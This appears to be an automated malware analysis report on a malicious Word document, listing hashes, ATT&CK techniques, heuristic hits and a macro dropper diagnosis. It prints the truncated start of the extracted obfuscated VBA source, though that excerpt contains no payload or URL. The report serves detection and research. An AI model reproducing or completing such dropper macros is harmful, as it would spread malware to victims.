Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5360d4ca4fc87dc1…

MALICIOUS

Office (OLE)

Size: 214.5 KB
Created: 2015-12-13 14:54:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 2574573c5f7c6b42f38b9d8eefff03ed
SHA-1: 2fa157bd59e72da805fbf57647bb5d44e92132b8
SHA-256: 5360d4ca4fc87dc1e384ec4af008f01414ba5d7f3ee3f6741441f7c36d2fef5a
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open auto-execution macro that calls the Shell() function. This indicates the macro is designed to execute arbitrary code, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6378588-0' further supports this dropper functionality. The obfuscated script attempts to reconstruct a URL from concatenated numerical values, but the full URL could not be resolved.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6378588-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6378588-0
  • VBA macros detected medium (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://www.iec.ch — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 33524 bytes
SHA-256: 4953327ebe9d9a0f2960c41b5599f127e2bf7f6696b0fc2681d96c2d78591283
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Ij4vga Lib "GxBfDLZ3" Alias "Ts9OACAV5PRySx" (ByVal F1GpezHODjz As String, FB9wgCDlmQLG1 As Long) As Long
#Else
Private Declare Function Ij4vga lib "GxBfDLZ3" Alias "Ts9OACAV5PRySx"(byval F1GpezHODjz as String, FB9wgCDlmQLG1 as Long ) as Long
#End If
Sub XZLiggCSvpT()
SIn3yQG5VFwNuPZ = 26
On Error Resume Next
JW07oXpYvK2pdtW = 63
Dim G0Afc086XbISr As String, PH6viuNpRR() As String, YoXLSGKoWxMiq6qm As Integer
T66aWsXm5 = 27
... (truncated)